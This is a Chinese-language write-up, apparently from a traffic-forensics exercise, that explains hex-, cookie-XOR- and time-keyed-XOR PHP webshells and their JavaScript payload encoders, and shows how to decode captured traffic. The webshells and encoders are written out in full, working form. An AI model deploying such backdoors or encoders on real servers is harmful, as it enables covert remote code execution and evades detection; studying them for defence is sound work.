看第二个示例
hex编码
木马
<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>
pack(“H*”, $v)是将 $v 转换为为二进制,也就是ASCII解码
编码器
module.exports = (pwd, data) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
ret[_] = Buffer.from(data[_]).toString('hex');
}
ret[pwd] = Buffer.from(data['_']).toString('hex');
return ret;
很简单,定义一个空对象,遍历data中的键值对,然后将所有值转换为16进制,这里要注意一下,最后返回的值是ret,而不是data,并发送原始的data['_']数据,所以这里不用删除
那么看一下流量包,是不是转换为字符串即可
木马
<?php
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=@$_COOKIE['PHPSESSID'];
for($i=0;$i<strlen($post);$i++){
$post[$i] = $post[$i] ^ $key[$i%26];
}
@eval($post);
?>
接受yzzddmr6和COOKIE[‘PHPSESSID’]两个参数进行base64解码后进行异或加密
编码器
let randomID = `x${Math.random().toString(16).substr(2)}`;
function xor(payload) {
let crypto = require('crypto');
let key = crypto.createHash('md5').update(randomID).digest('hex').substr(6);
ext.opts.httpConf.headers['Cookie'] = 'PHPSESSID=' + key;
key = key.split("").map(t => t.charCodeAt(0));
//let payload="phpinfo();";
let cipher = payload.split("").map(t => t.charCodeAt(0));
for (let i = 0; i < cipher.length; i++) {
cipher[i] = cipher[i] ^ key[i % 26]
}
cipher = cipher.map(t => String.fromCharCode(t)).join("")
cipher = Buffer.from(cipher).toString('base64');
//console.log(cipher)
return cipher;
}
data['_'] = Buffer.from(data['_']).toString('base64');
data[pwd] = `eval(base64_decode("${data['_']}"));`;
data[pwd]=xor(data[pwd]);
data[‘_’] 进行base编码后,进行异或加密,
加密方法,首先生成基于randomID的key,再将数据和key转换为字符编码数组,进行异或加密和base64加密,
那么加密方法为
base64——>异或——>base64
查看数据包进行解密,在线网站异或解密
结果
再将base64函数中的内容base64解码即可
random_time
木马
<?php
date_default_timezone_set("PRC");
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
$post[$i] = $post[$i] ^ $key[$i%32];
}
eval($post);
?>
设置时区,将当前时间md5加密后作为key,与yzddmr6内容进行异或加密,然后执行
编码器
function xor(payload){
let crypto = require('crypto');
Object.assign(Date.prototype, {
switch (time) {
let date = {
"yy": this.getFullYear(),
"MM": this.getMonth() + 1,
"dd": this.getDate(),
"hh": this.getHours(),
"mm": this.getMinutes(),
"ss": this.getSeconds()
};
if (/(y+)/i.test(time)) {
time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length));
}
Object.keys(date).forEach(function (i) {
if (new RegExp("(" + i + ")").test(time)) {
if (RegExp.$1.length == 2) {
date[i] < 10 ? date[i] = '0' + date[i] : date[i];
}
time = time.replace(RegExp.$1, date[i]);
}
})
return time;
}
})
let newDate = new Date();
let time = newDate.switch('yyyy-MM-dd hh:mm');
let key = crypto.createHash('md5').update(time).digest('hex')
key=key.split("").map(t => t.charCodeAt(0));
//let payload="phpinfo();";
let cipher = payload.split("").map(t => t.charCodeAt(0));
for(let i=0;i<cipher.length;i++){
cipher[i]=cipher[i]^key[i%32]
}
cipher=cipher.map(t=>String.fromCharCode(t)).join("")
cipher=Buffer.from(cipher).toString('base64');
//console.log(cipher)
return cipher;
}
data['_'] = Buffer.from(data['_']).toString('base64');
data[pwd] = `eval(base64_decode("${data['_']}"));`;
data[pwd]=xor(data[pwd]);
delete data['_'];
return data;
先对原始的数据进行base64编码后再进行异或加密,获取当前时间 md5加密与data进行异或加密后,在base64编码